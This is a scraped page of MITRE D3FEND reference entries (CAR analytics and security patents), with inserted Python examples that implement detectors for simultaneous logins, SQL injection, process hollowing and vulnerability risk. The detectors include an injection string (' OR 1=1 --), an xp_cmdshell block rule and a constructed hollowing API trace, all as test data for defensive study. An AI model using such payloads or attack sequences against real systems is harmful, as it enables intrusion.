kb-reference-of

kb-reference-title

  • "CAR-2014-05-002: Services launching Cmd"

Usage (5)

kb-abstract

  • "Multiple users logged into a single machine at the same time, or even within the same hour, do not typically occur in networks we have observed.

    Logon events are Windows Event Code 4624 for Windows Vista and above, 518 for pre-Vista. Logoff events are 4634 for Windows Vista and above, 538 for pre-Vista. Logon types 2, 3, 9 and 10 are of interest. For more details see the Logon Types table on Microsoft's Audit Logon Events page."

kb-author

  • "MITRE"

rdfs:label

  • "Reference - CAR-2013-02-008: Simultaneous Logins on a Host - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-02-008: Simultaneous Logins on a Host"
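Added worked example (not part of this D3FEND page or of MITRE CAR): the analytic above reduces to filtering 4624 events to logon types 2, 3, 9 and 10 and then finding hosts where more than one distinct account logged on inside an hour. The Python below does that over a constructed set of logon records. The event rows, the one-hour window, and the default exclusion of machine accounts (names ending in "$", a tuning choice the quoted text does not make) are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

LOGON_EVENT = 4624                 # Windows Vista and later; 518 on pre-Vista hosts
INTERESTING_TYPES = {2, 3, 9, 10}  # interactive, network, new credentials, remote interactive

# Constructed sample events (not real logs): time, event id, host, account, logon type.
SAMPLE_EVENTS = [
    ("2024-01-10T09:00:00", 4624, "WS-101", "alice", 2),
    ("2024-01-10T09:05:00", 4624, "WS-101", "WS-202$", 3),   # machine account, dropped by default
    ("2024-01-10T09:20:00", 4624, "WS-101", "svc_backup", 3),
    ("2024-01-10T09:40:00", 4624, "WS-101", "bob", 10),
    ("2024-01-10T13:00:00", 4624, "WS-202", "carol", 2),
    ("2024-01-10T15:30:00", 4624, "WS-202", "carol", 2),
    ("2024-01-10T15:35:00", 4634, "WS-202", "dave", 3),      # logoff, not a logon
    ("2024-01-10T16:00:00", 4624, "WS-303", "erin", 5),      # service logon, not of interest
    ("2024-01-10T16:10:00", 4624, "WS-303", "frank", 2),
]


def parse_events(rows):
    """Turn the tuple rows into dicts with a parsed timestamp."""
    return [{"time": datetime.fromisoformat(ts), "event_id": eid, "host": host,
             "user": user, "logon_type": ltype} for ts, eid, host, user, ltype in rows]


def simultaneous_logins(events, window=timedelta(hours=1), ignore_machine_accounts=True):
    """Per host, windows in which more than one distinct account logged on.

    Only 4624 events with logon types 2, 3, 9 or 10 are considered. Events on
    a host are grouped into windows that open at the first qualifying logon
    and close `window` later; a window is reported when it holds more than
    one distinct account. Returns {host: [(window_start, sorted_users), ...]}.
    """
    by_host = defaultdict(list)
    for e in events:
        if e["event_id"] != LOGON_EVENT or e["logon_type"] not in INTERESTING_TYPES:
            continue
        if ignore_machine_accounts and e["user"].endswith("$"):
            continue
        by_host[e["host"]].append(e)

    findings: Dict[str, List[Tuple[datetime, List[str]]]] = {}
    for host, evs in by_host.items():
        evs.sort(key=lambda ev: ev["time"])
        start, users = None, set()
        for e in evs + [None]:            # trailing None flushes the last window
            if e is not None and start is not None and e["time"] - start <= window:
                users.add(e["user"])
                continue
            if len(users) > 1:
                findings.setdefault(host, []).append((start, sorted(users)))
            if e is not None:
                start, users = e["time"], {e["user"]}
    return findings


if __name__ == "__main__":
    for host, windows in simultaneous_logins(parse_events(SAMPLE_EVENTS)).items():
        for start, users in windows:
            print(f"{host}: {len(users)} accounts within an hour of {start}: {users}")
```

On the sample data only WS-101 is reported (alice, svc_backup and bob within forty minutes); WS-202 sees the same account twice hours apart and WS-303 has one interesting logon. Windows are anchored at the first logon after the previous window closes, so two logons 61 minutes apart are never paired; widen the window or switch to a sliding one if that matters in your environment.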

Usage (5)

kb-abstract

  • "Techniques for sinkholing bad network domains by registering the bad network domains on the Internet are provided. In some embodiments, sinkholing bad network domains by registering the bad network domains on the Internet includes determining a network domain is a bad network domain, in which the bad network domain is determined to be associated with an identified malware (e.g., malware that has been identified and has been determined to be associated with the bad domain), and the bad network domain is sinkholed by registering the bad network domain with a sinkholed IP address; and identifying a host that is infected with the identified malware based on an attempt by the host to connect to the sinkholed IP address."

kb-author

  • "Huagang Xie; Wei Xu; Nir Zuk"

kb-mitre-analysis

  • "This patent describes a technique to identify bad domains that are associated with malware and sinkhole the bad domain. Bad domains are identified by receiving malware samples and executing the malware sample in a virtual execution environment to identify network domains that the malware sample attempts to connect to during execution. Network domains that are identified during malware execution are then generated into signatures to identify bad domains for other hosts. Once identified, the bad domains are sinkholed by translating the domain to a valid IP address that is associated with a device controlled by a cloud security provider."

kb-organization

  • "Palo Alto Networks Inc"

rdfs:label

  • "Reference - Sinkholing bad network domains by registering the bad network domains on the internet - Palo Alto Networks Inc"

kb-reference-of

kb-reference-title

  • "Sinkholing bad network domains by registering the bad network domains on the internet"

Usage (5)

kb-abstract

  • "To analyze open-source code at a large scale, a security domain graph language ("SGL") has been created that functions as a vulnerability description language and facilitates program analysis queries. The SGL facilitates building and maintaining a graph database to catalogue vulnerabilities found in open-source components. This graphical database can be accessed via a database interface directly or accessed by an agent that interacts with the database interface. To build the graph database, a database interface processes an open-source component and creates graph structures which represent relationships present in the open-source component. The database interface transforms a vulnerability description into a canonical form based on a schema for the graph database and updates the database based on a determination of whether the vulnerability is a duplicate. This ensures quality and consistency of the vulnerability dataset maintained in the graph database."

kb-author

  • "Darius Tsien Wei FOO, Ming Yi ANG, Asankhaya Sharma, Jie Shun YEO"

kb-organization

  • "Veracode, Inc."

rdfs:label

  • "Reference - Software vulnerability graph database"

kb-reference-of

kb-reference-title

  • "Software vulnerability graph database"

Usage (5)

kb-abstract

  • "Squiblydoo is a specific usage of regsvr32.dll to load a COM scriptlet directly from the internet and execute it in a way that bypasses application whitelisting. It can be seen by looking for regsvr32.exe executions that load the scrobj.dll (which execute the COM scriptlet) or, if that is too noisy, those that also load content directly via HTTP or HTTPS."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2019-04-003: Squiblydoo - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2019-04-003: Squiblydoo"

Usage (5)

kb-abstract

  • "In our previous blog, we saw how arbitrary code execution resulting from stack-buffer overflows can be partly mitigated by marking segments of memory as non-executable, a technology known as Execshield. However stack-buffer overflow exploits can still effectively overwrite the function return address, which leads to several interesting exploitation techniques like ret2libc, ret2gets, and ret2plt. With all of these methods, the function return address is overwritten and attacker controlled code is executed when the program control transfers to overwritten address on the stack."

kb-author

  • "Huzaifa Sidhpurwala"

kb-mitre-analysis

  • ""

kb-organization

  • "Red Hat"

rdfs:label

  • "Reference - Security Technologies: Stack Smashing Protection (StackGuard) - Red Hat"

kb-reference-of

kb-reference-title

  • "Security Technologies: Stack Smashing Protection (StackGuard)"

Usage (5)

kb-abstract

  • "Malicious actors may rename built-in commands or external tools, such as those provided by SysInternals, to better blend in with the environment. In those cases, the file path name is arbitrary and may blend in well with the background. If the arguments are closely inspected, it may be possible to infer what tools are running and understand what an adversary is doing. When any legitimate software shares the same command lines, it must be whitelisted according to the expected parameters."

kb-author

  • ""

kb-mitre-analysis

  • ""

kb-organization

  • ""

rdfs:label

  • "Reference - CAR-2013-07-001: Suspicious Arguments - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-07-001: Suspicious Arguments"

Usage (5)

kb-abstract

  • "In Windows, files should never execute out of certain directory locations. Any of these locations may exist for a variety of reasons, and executables may be present in the directory but should not execute. As a result, some defenders make the mistake of ignoring these directories and assuming that a process will never run from one. There are known TTPs that have taken advantage of this fact to go undetected. This fact should inform defenders to monitor these directories more closely, knowing that they should never contain running processes."

kb-author

  • ""

kb-mitre-analysis

  • ""

kb-organization

  • ""

rdfs:label

  • "Reference - CAR-2013-05-002: Suspicious Run Locations - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-05-002: Suspicious Run Locations"

Usage (5)

kb-abstract

  • "Techniques for synchronizing a honey network configuration to reflect a target network environment are disclosed. In some embodiments, a system for synchronizing a honey network configuration to reflect a target network environment includes a device profile data store that includes a plurality of attributes of each of a plurality of devices in the target network environment; a virtual machine (VM) image library that includes one or more VM images; and a virtual clone manager executed on a processor that instantiates a virtual clone of one or more devices in the target enterprise network using a VM image selected from the VM image library that is customized based on one or more attributes for a target device in the device profile data store."

kb-author

  • "Taylor Ettema, Huagang Xie"

kb-mitre-analysis

  • ""

kb-organization

  • "Palo Alto Networks Inc"

rdfs:label

  • "Reference - Synchronizing a honey network configuration to reflect a target network environment - Palo Alto Networks Inc"

kb-reference-of

kb-reference-title

  • "Synchronizing a honey network configuration to reflect a target network environment"

Usage (5)

kb-abstract

  • "A system for identifying the presence of ransomware on a network, including a plurality of resources, interconnected to form a network and at least one decoy drive. The decoy drive includes a plurality of decoy files to be encrypted by the ransomware, and wherein the decoy drive continuously provides the decoy files thereby continuously occupying the ransomware."

kb-author

  • "Doron Kolton; Rami Mizrahi; Omer Zohar; Benny Ben-Rabi; Alex Barbalat; Shlomi Gabai"

kb-mitre-analysis

  • ""

kb-organization

  • "Fidelis Cybersecurity Solutions Inc"

rdfs:label

  • "Reference - System and a method for identifying the presence of malware and ransomware using mini-traps set at network endpoints - Fidelis Cybersecurity Solutions Inc"

kb-reference-of

kb-reference-title

  • "System and a method for identifying the presence of malware and ransomware using mini-traps set at network endpoints"

Usage (5)

kb-abstract

  • "The present invention utilizes computer vision technologies to identify potentially malicious URLs and executable files in a computing device. In one embodiment, a Siamese convolutional neural network is trained to identify the relative similarity between image versions of two strings of text. After the training process, a list of strings that are likely to be utilized in malicious attacks are provided (e.g., legitimate URLs for popular websites). When a new string is received, it is converted to an image and then compared against the image of list of strings. The relative similarity is determined, and if the similarity rating falls below a predetermined threshold, an alert is generated indicating that the string is potentially malicious."

kb-author

  • "Jonathan Woodbridge; Anjum Ahuja; Daniel Grant"

kb-mitre-analysis

  • "This patent describes a mechanism to detect homoglyph strings that involves training a Siamese convolutional neural network to compare images of strings. Strings of legitimate URLs for websites along with known suspicious strings are converted to images during the training process to create an index. New strings are converted to images and then compared to the index for similarity; if the string deviates beyond a threshold, an alert is triggered."

kb-organization

  • "Endgame Inc"

rdfs:label

  • "Reference - System and method for detecting homoglyph attacks with a siamese convolutional neural network - Endgame Inc"

kb-reference-of

kb-reference-title

  • "System and method for detecting homoglyph attacks with a siamese convolutional neural network"

Usage (5)

kb-abstract

  • "In the embodiments described herein, a malicious code detection module identifies potentially malicious instructions in memory of a computing device. The malicious code detection module examines the call stack for each thread running within the operating system of the computing device. Within each call stack, the malicious code detection module identifies the originating module for each stack frame and determines whether the originating module is backed by an image on disk. If an originating module is not backed by an image on disk, the thread containing that originating module is flagged as potentially malicious, execution of the thread optionally is suspended, and an alert is generated for the user or administrator."

kb-author

  • "Joseph W. Desimone"

kb-mitre-analysis

  • ""

kb-organization

  • "Endgame Inc"

rdfs:label

  • "Reference - System and method for detecting malware injected into memory of a computing device - Endgame Inc"

kb-reference-of

kb-reference-title

  • "System and method for detecting malware injected into memory of a computing device"

Usage (5)

kb-abstract

  • "A system and software for identifying the change of user behavior on a website includes analyzing the actions of users on a website comprising a plurality of fields or input parameters that identify the actions performed on a website including fields related to previous actions by that user or other users of the website. The fields or input parameters are represented in a vector format where vectors represent different sessions of activity on the website, pages of the website, users of the website, or other attributes of the use of a website. Analysis is performed to determine if new sessions are similar or dissimilar to previously known sessions and if a session is converging or diverging from known sessions based on the velocity and direction of the velocity of the vectors in the vector space."

kb-author

  • "Mike Eynon; Laura Mather; Erik Westland; Jim Lloyd"

kb-mitre-analysis

  • "This patent describes a technique for detecting fraudulent behavior on a website. Website behavior is mapped to build a multidimensional representation of user actions on a website that is updated as additional actions are recorded. Example actions on a website that are recorded include clicks by a user on the website and entering data into forms. Current behavior is compared against baseline recorded behavior and if current behavior deviates above a threshold, an alert is issued."

kb-organization

  • "Silver Tail Systems"

rdfs:label

  • "Reference - System and Method for Detection of a Change in Behavior in the Use of a Website Through Vector Velocity Analysis - Silver Tail Systems"

kb-reference-of

kb-reference-title

  • "System and Method for Detection of a Change in Behavior in the Use of a Website Through Vector Velocity Analysis"

Usage (5)

kb-abstract

  • "A system for identifying the presence of advanced persistent threats on a network including a plurality of resources, interconnected to form a network, at least one decoy resource, at least one mini-trap installed on at least one of the plurality of resources and functionally associated with at least one of the at least one decoy resource, the at least one mini-trap comprising deceptive information directing malware accessing the at least one mini-trap to the decoy resource associated therewith, and a manager node forming part of the network, locally or remotely, and configured to manage placement of the at least one mini-trap on the at least one of the plurality of resources and association between the at least one mini-trap and the decoy resource associated therewith."

kb-author

  • "Doron Kolton; Rami Mizrahi; Omer Zohar; Benny Ben-Rabi; Alex Barbalat; Shlomi Gabai"

kb-mitre-analysis

  • "Questionable or all files (as determined by the enterprise) are forwarded to the decoy network. Using a manager node user interface, you can set up fake information (e.g. the IP address of a decoy FTP server) and deploy decoy physical or virtual endpoints."

kb-organization

  • "Fidelis Cybersecurity Solutions Inc"

rdfs:label

  • "Reference - System and method for identifying the presence of malware using mini-traps set at network endpoints - Fidelis Cybersecurity Solutions Inc"

kb-reference-of

kb-reference-title

  • "System and method for identifying the presence of malware using mini-traps set at network endpoints"

Usage (5)

kb-abstract

  • "A computer implemented method for preventing SQL injection attacks comprises intercepting a web request associated with a web service at a first software hook in a first web service execution context, persisting at least a portion of the intercepted web request in a storage location associated with the first software hook and accessible to at least one additional execution context, intercepting a database query generated by at least one web service processing operation at a second software hook associated with the execution of the query, wherein the query is generated in response to the intercepted web request and the second hook retrieves the persisted portion of the intercepted web request, comparing a portion of the persisted portion of the intercepted web request with at least a portion of the intercepted database query, and determining, prior to the query being executed, whether the query corresponds to a potential SQL injection attack."

kb-author

  • "Derek A. Soeder"

kb-mitre-analysis

  • "This patent describes a technique for detecting SQL injection attacks. Software hooks are installed in a web service or application to intercept function calls, events, or messages that are passed between software components. Intercepted database queries associated with a web request are analyzed character by character and if it contains a character that would modify the syntax the query is rejected or sanitized. Security rules and policies may also determine rejection. For example, an administrator or developer may implement a rule that rejects any database query that is excessively long or that contains a particular string, such as "Xp cmdshell"."
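
The two-hook design above (persist the web request at the first hook, compare it with the generated query at the second, before execution) is illustrated by the following added example, which is not Cylance's code and not code from the page. The "comparison" is done structurally: a minimal SQL lexer tokenizes the query, and every request parameter value found in the query must fall inside a single token (a literal); a value that spans token boundaries has changed the syntax and the query is rejected. The request store, the lexer, the policy rules (length limit, the "xp_cmdshell" string from the analysis) and the four sample request/query pairs are all assumptions for the example.

```python
import re

# Hook 1 storage: the intercepted request's parameters, persisted so that the
# later query hook can see them. Keyed by request id here; a real hook would
# use thread- or context-local storage shared with the database layer.
_REQUEST_STORE = {}

# Policy rules an administrator may add on top of the structural check
# (the length limit is an assumed value).
POLICY_RULES = [
    ("query exceeds length limit", lambda q: len(q) > 2000),
    ("query references xp_cmdshell", lambda q: "xp_cmdshell" in q.lower()),
]

# Minimal SQL lexer: enough to tell whether a request value stays inside one
# token (a literal) or spills into the surrounding syntax.
_TOKEN = re.compile(r"""
    (?P<ws>\s+)
  | (?P<str>'(?:[^']|'')*')
  | (?P<num>\d+(?:\.\d+)?)
  | (?P<comment>--[^\n]*|/\*.*?\*/)
  | (?P<ident>[A-Za-z_][A-Za-z_0-9]*)
  | (?P<op><>|<=|>=|!=|[=<>(),;*])
  | (?P<other>.)
""", re.VERBOSE | re.DOTALL)


def tokenize(sql):
    """Return (start, end, kind) for every non-whitespace token in sql."""
    return [(m.start(), m.end(), m.lastgroup)
            for m in _TOKEN.finditer(sql) if m.lastgroup != "ws"]


def hook_web_request(request_id, params):
    """Hook 1: persist the request parameters for the query hook."""
    _REQUEST_STORE[request_id] = {k: str(v) for k, v in params.items()}


def value_spans(query, value):
    """Offsets at which the raw or quote-escaped value occurs in the query."""
    spans = []
    for needle in {value, value.replace("'", "''")}:
        if not needle:
            continue
        start = query.find(needle)
        while start != -1:
            spans.append((start, start + len(needle)))
            start = query.find(needle, start + 1)
    return spans


def hook_db_query(request_id, query):
    """Hook 2: runs before execution; returns a reason to reject, or None to proceed."""
    tokens = tokenize(query)
    for name, value in _REQUEST_STORE.get(request_id, {}).items():
        for start, end in value_spans(query, value):
            inside_one_token = any(t0 <= start and end <= t1 for t0, t1, _ in tokens)
            if not inside_one_token:
                return f"parameter {name!r} spans multiple SQL tokens"
    for reason, rule in POLICY_RULES:
        if rule(query):
            return reason
    return None


def demo():
    """Four constructed request/query pairs: benign, injected, escaped quote, policy hit."""
    hook_web_request("r1", {"user": "alice", "page": 2})
    benign = "SELECT id, name FROM users WHERE name = 'alice' LIMIT 2"
    hook_web_request("r2", {"user": "' OR 1=1 --"})
    attack = "SELECT id, name FROM users WHERE name = '' OR 1=1 --'"
    hook_web_request("r3", {"user": "O'Brien"})
    escaped = "SELECT id FROM users WHERE name = 'O''Brien'"
    hook_web_request("r4", {"cmd": "dir"})
    policy = "EXEC xp_cmdshell 'dir'"
    return (hook_db_query("r1", benign), hook_db_query("r2", attack),
            hook_db_query("r3", escaped), hook_db_query("r4", policy))
```

The escaped-quote case is the one that a plain character blacklist gets wrong: `O'Brien` is a legitimate value, and once the application escapes it to `'O''Brien'` it lexes as a single string literal, so the structural check passes it while still rejecting `' OR 1=1 --`, which breaks out of its literal.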

kb-organization

  • "Cylance Inc"

rdfs:label

  • "Reference - System and method for internet security - Cylance Inc"

kb-reference-of

kb-reference-title

  • "System and method for internet security"

Usage (5)

kb-abstract

  • "In an embodiment of the invention, a system for assessing vulnerabilities includes: a security management system; a network device in a system under test (SUT), wherein the network device is privy to traffic in the SUT; and wherein the SMS is privy to traffic that is known by the network device and/or to one or more traffic observations that is known by the network device."

kb-author

  • "Scott Parcel"

kb-organization

  • "Cenzic Inc, Trustwave Holdings Inc"

rdfs:label

  • "Reference - System and method for managed security assessment and mitigation"

kb-reference-of

kb-reference-title

  • "System and method for managed security assessment and mitigation"

Usage (5)

kb-abstract

  • "A computer readable storage medium has instructions for execution on a computer. The instructions monitor transactions between a server and a set of clients. An evaluation of session indicators associated with the transactions is performed. Individual sessions between the server and individual clients of the plurality of clients are isolated in response to the evaluation."

kb-author

  • "Matt Frantz; Andreas Wittenstein; Mike Eynon; Laura Mather; Jim Lloyd; James Schumacher; Duane Murphy"

kb-mitre-analysis

  • "This patent describes a technique for detecting man-in-the-browser attacks. Current user session data is compared with the average user session that is based on collected data representing average values across all user sessions over a data-collection period. User session data includes average time between clicks and the order in which website pages are viewed. The comparisons are combined to generate a score that indicates the likelihood that the current session is a man-in-the-browser attack."

kb-organization

  • "EMC IP Holding Co LLC"

rdfs:label

  • "Reference - System and Method for Network Security Including Detection of Attacks Through Partner Websites - EMC IP Holding Co LLC"

kb-reference-of

kb-reference-title

  • "System and Method for Network Security Including Detection of Attacks Through Partner Websites"

Usage (5)

kb-abstract

  • "A method and system for remediating a process hollowing intrusion on a user device comprising detecting a process starting on the user device, preparing the process to monitor Application Programming Interface (API) calls between the process and an operating system of the user device, determining whether the process is associated with a process hollowing intrusion based on information associated with the process and/or the API calls, and executing security policies against the process associated with the process hollowing intrusion. In examples, it is determined whether the child process is associated with a process hollowing intrusion in response to determining whether one or more API calls associated with known process hollowing intrusions modify executable memory of and/or modify an entry point address of the child process."
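
The abstract above describes monitoring a child's API calls and deciding on hollowing from calls that modify the child's executable memory or its entry point. The following added example (not Carbon Black's code, not code from the page) scores a constructed per-process API trace against that description: a process created suspended, whose original image is unmapped, that receives written memory and a redirected thread context and is then resumed, reaches the alert threshold, while a launcher that merely starts a child suspended and resumes it untouched does not. The trace format, the indicator weights and the threshold are assumptions; the API names are the usual user-mode calls involved in hollowing.

```python
from collections import defaultdict

CREATE_SUSPENDED = 0x00000004   # dwCreationFlags bit for CreateProcess

# Constructed API-call trace in the shape a user-mode hooking agent might
# record: (caller_pid, api, target_pid, details). Not real telemetry.
SAMPLE_TRACE = [
    # Hollowing: benign host started suspended, image unmapped, payload written,
    # thread context (entry point) redirected, thread resumed.
    (100, "CreateProcessW", 200, {"flags": CREATE_SUSPENDED, "image": r"C:\Windows\System32\svchost.exe"}),
    (100, "NtUnmapViewOfSection", 200, {}),
    (100, "VirtualAllocEx", 200, {"protect": "PAGE_EXECUTE_READWRITE"}),
    (100, "WriteProcessMemory", 200, {"size": 0x4A000}),
    (100, "SetThreadContext", 200, {"entry_point_changed": True}),
    (100, "ResumeThread", 200, {}),
    # Benign: a launcher creates a child suspended and resumes it untouched.
    (300, "CreateProcessW", 400, {"flags": CREATE_SUSPENDED, "image": r"C:\Program Files\App\helper.exe"}),
    (300, "ResumeThread", 400, {}),
    # Benign: ordinary process start.
    (500, "CreateProcessW", 600, {"flags": 0, "image": r"C:\Windows\System32\notepad.exe"}),
]

# Indicators scored per target process. Weights are assumed for this example.
INDICATORS = [
    ("created suspended", 1,
     lambda api, d: api == "CreateProcessW" and bool(d.get("flags", 0) & CREATE_SUSPENDED)),
    ("original image unmapped", 2,
     lambda api, d: api in ("NtUnmapViewOfSection", "ZwUnmapViewOfSection")),
    ("executable region allocated", 1,
     lambda api, d: api == "VirtualAllocEx" and "EXECUTE" in d.get("protect", "")),
    ("memory written into child", 2,
     lambda api, d: api == "WriteProcessMemory"),
    ("entry point redirected", 3,
     lambda api, d: api == "SetThreadContext" and bool(d.get("entry_point_changed"))),
    ("resumed after modification", 1,
     lambda api, d: api == "ResumeThread"),
]
MODIFYING = {"original image unmapped", "memory written into child", "entry point redirected"}
ALERT_THRESHOLD = 6   # assumed: more than "suspended + resumed" is needed to fire


def assess(trace):
    """Score every target process; returns {pid: {"score": int, "hits": [...]}}."""
    state = defaultdict(lambda: {"score": 0, "hits": [], "modified": False})
    for _caller, api, target, detail in trace:
        s = state[target]
        for name, weight, matches in INDICATORS:
            if not matches(api, detail) or name in s["hits"]:
                continue
            # A resume only counts once something in the child was modified.
            if name == "resumed after modification" and not s["modified"]:
                continue
            s["hits"].append(name)
            s["score"] += weight
            if name in MODIFYING:
                s["modified"] = True
    return dict(state)


def hollowed(trace):
    """PIDs whose indicator score reaches the alert threshold."""
    return sorted(pid for pid, s in assess(trace).items() if s["score"] >= ALERT_THRESHOLD)


if __name__ == "__main__":
    for pid, s in assess(SAMPLE_TRACE).items():
        print(pid, s["score"], s["hits"])
    print("hollowed:", hollowed(SAMPLE_TRACE))
```

Scoring rather than matching a fixed sequence matters because legitimate software (debuggers, some installers and launchers) also creates children suspended, and because the unmap step is optional in several hollowing variants; the entry-point redirection carries the most weight since the abstract singles it out.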

kb-author

  • "Jeffrey Albin Kraemer, Paul Matthew Drapeau"

kb-mitre-analysis

  • ""

kb-organization

  • "Carbon Black Inc"

rdfs:label

  • "Reference - System and Method for Process Hollowing Detection - Carbon Black Inc"

kb-reference-of

kb-reference-title

  • "System and Method for Process Hollowing Detection"

Usage (5)

kb-abstract

  • "A system and method for providing an actively invalidated client-side network resource cache are disclosed. A particular embodiment includes: a client configured to request, for a client application, data associated with an identifier from a server; the server configured to provide the data associated with the identifier and to establish a queue associated with the identifier at a scalable message queuing system, the client being configured to subscribe to the queue at the scalable message queuing system to receive invalidation information associated with the data; the server being further configured to signal the queue of an invalidation event associated with the data; the scalable message queuing system being configured to convey information indicative of the invalidation event to the client; and the client being further configured to re-request the data associated with the identifier from the server upon receipt of the information indicative of the invalidation event."

kb-author

  • "Jon Watte"

kb-mitre-analysis

  • ""

kb-organization

  • "IMVU"

rdfs:label

  • "Reference - System and method for providing an actively invalidated client-side network resource cache - IMVU"

kb-reference-of

kb-reference-title

  • "System and method for providing an actively invalidated client-side network resource cache"

Usage (5)

kb-abstract

  • "In the embodiments described herein, a malicious code detection module identifies potentially malicious instructions in volatile memory of a computing device before the instructions are executed. The malicious code detection module identifies an executable file, such as an .exe file, in memory, validates one or more components of the executable file against the same file stored in non-volatile storage, and issues an alert if the validation fails."

kb-author

  • "Joseph W. Desimone"

kb-mitre-analysis

  • ""

kb-organization

  • "Endgame Inc"

rdfs:label

  • "Reference - System and method for validating in-memory integrity of executable files to identify malicious activity - Endgame Inc"

kb-reference-of

kb-reference-title

  • "System and method for validating in-memory integrity of executable files to identify malicious activity"

Usage (5)

kb-abstract

  • "Embodiments of the present invention are directed to a method and system for automated risk analysis. The method includes accessing host configuration information of a host and querying a vulnerability database based on the host configuration information. The method further includes receiving a list of vulnerabilities and accessing a plurality of vulnerability scores. The list of vulnerabilities corresponds to vulnerabilities of the host. Vulnerabilities can be removed from the list based on checking for installed fixes corresponding to vulnerability. A composite risk score can then be determined for the host and each software product of the host based on the plurality of vulnerability scores. An aggregate risk score can then be determined for the host and each software product of the host based on the plurality of vulnerability scores."
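
The pipeline in the abstract (host configuration, vulnerability database query, removal of fixed items, then a composite and an aggregate score per host and per product) is carried through in the following added example. It is not CA's code and not code from the page; the vulnerability database, host inventory, identifiers and the two scoring rules are constructed for illustration (the abstract does not define how composite and aggregate scores are computed, so "worst single score" and "probability that at least one is exploited" are assumed interpretations).

```python
# Constructed vulnerability database; identifiers are placeholders, not real CVEs.
VULN_DB = [
    {"id": "VULN-0001", "product": "webserver", "versions": {"2.4.0", "2.4.1"}, "score": 9.8, "fix": "KB-101"},
    {"id": "VULN-0002", "product": "webserver", "versions": {"2.4.1"},          "score": 5.0, "fix": "KB-102"},
    {"id": "VULN-0003", "product": "dbclient",  "versions": {"1.0"},            "score": 7.5, "fix": "KB-201"},
    {"id": "VULN-0004", "product": "sshd",      "versions": {"8.2"},            "score": 4.0, "fix": None},
    {"id": "VULN-0005", "product": "dbclient",  "versions": {"0.9"},            "score": 9.1, "fix": "KB-200"},
]

# Constructed host configuration as an inventory agent would report it.
HOST = {
    "name": "web01",
    "products": {"webserver": "2.4.1", "dbclient": "1.0", "sshd": "8.2"},
    "installed_fixes": {"KB-101"},
}


def query_vulnerabilities(host, db):
    """Vulnerabilities whose product/version matches the host configuration."""
    return [v for v in db if host["products"].get(v["product"]) in v["versions"]]


def remove_fixed(vulns, host):
    """Drop vulnerabilities whose fix is already installed on the host."""
    return [v for v in vulns if not (v["fix"] and v["fix"] in host["installed_fixes"])]


def composite_score(scores):
    """Worst case: the highest base score among the open vulnerabilities."""
    return max(scores, default=0.0)


def aggregate_score(scores):
    """Assumed combination rule: treat score/10 as an independent exploitation
    likelihood and report the chance that at least one is exploited, on 0..10."""
    p_none = 1.0
    for s in scores:
        p_none *= 1.0 - s / 10.0
    return round(10.0 * (1.0 - p_none), 2)


def risk_report(host, db=VULN_DB):
    """Composite and aggregate scores for the host and for each installed product."""
    open_vulns = remove_fixed(query_vulnerabilities(host, db), host)
    products = {}
    for product in host["products"]:
        mine = [v for v in open_vulns if v["product"] == product]
        scores = [v["score"] for v in mine]
        products[product] = {"open": [v["id"] for v in mine],
                             "composite": composite_score(scores),
                             "aggregate": aggregate_score(scores)}
    all_scores = [v["score"] for v in open_vulns]
    return {"host": host["name"], "composite": composite_score(all_scores),
            "aggregate": aggregate_score(all_scores), "products": products}


if __name__ == "__main__":
    print(risk_report(HOST))
```

The two numbers answer different questions: the composite score says how bad the single worst open issue is (7.5 here, after the 9.8 was removed by its installed fix), while the aggregate rises with the number of open issues (three moderate ones push it above 9), which is the signal for prioritising a host with many unpatched medium findings over one with a single high.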

kb-author

  • "Matthew Cruz Elder, Darrell Martin Kienzle, Pratyusa K. Manadhata, Ryan Kumar Persaud"

kb-organization

  • "CA Inc"

rdfs:label

  • "Reference - System and method for vulnerability risk analysis"

kb-reference-of

kb-reference-title

  • "System and method for vulnerability risk analysis"

Usage (5)

kb-abstract

  • "A system is connected to a plurality of user devices coupled to an enterprise's network. The system continuously collects, stores, and analyzes forensic data related to the enterprise's network. Based on the analysis, the system is able to determine normal behavior of the network and portions thereof and thereby identify abnormal behaviors within the network. Upon identification of an abnormal behavior, the system determines whether the abnormal behavior relates to a security incident. Upon determining a security incident in any portion of the enterprise's network, the system extracts forensic data respective of the security incident and enables further assessment of the security incident as well as identification of the source of the security incident. The system provides real-time damage assessment respective of the security incident as well as the security incident's attributions."

kb-author

  • "Gil BARAK; Shai MORAG"

kb-mitre-analysis

  • "This patent describes detecting abnormal behavior related to a security incident by collecting and analyzing forensic data in real time. Forensic data may include:

    * URLs visited
    * data downloaded or streamed
    * messages received and sent
    * amount of memory used for processing

    The data is then analyzed according to a set of dynamically created rules to determine normal behavior patterns associated with the network or user devices. Anomalies between current behavior and normal behavior patterns trigger an alert."

kb-organization

  • "Palo Alto Networks Inc"

rdfs:label

  • "Reference - System and method thereof for identifying and responding to security incidents based on preemptive forensics - Palo Alto Networks Inc"

kb-reference-of

kb-reference-title

  • "System and method thereof for identifying and responding to security incidents based on preemptive forensics"

Usage (5)

kb-abstract

  • "A system is used for detection of advanced persistent and non-persistent threats in a computerized environment. The system is connected to a plurality of user devices coupled to an enterprise's network. The system receives via an interface an electronic notification of at least one event in the operating system of the computer. The system then analyzes the at least one event. The system then generates a causality chain for the at least one event respective of the analysis. The causality chain comprises all the threads that attributed to the at least one event in a chronological order. The system then identifies a main thread that started the causality chain that led to the at least one event. Then, the system determines whether the main thread is associated with malicious software. Upon determination that the main thread is associated with malicious software, the causality chain is marked as infected."

kb-author

  • "Gil BARAK"

kb-mitre-analysis

  • "This patent describes detecting malicious processes on a host. Agents are deployed on hosts that monitor all initiated processes and determine whether a process was initiated at boot or initiated by another process. If not initiated at boot or by another process, the process is identified as suspicious and an alert is triggered."

kb-organization

  • "Palo Alto Networks Inc, Cyber Secdo Ltd"

rdfs:label

  • "Reference - System and methods thereof for causality identification and attributions determination of processes in a network - Palo Alto Networks Inc, Cyber Secdo Ltd"

kb-reference-of

kb-reference-title

  • "System and methods thereof for causality identification and attributions determination of processes in a network"

Usage (5)

kb-abstract

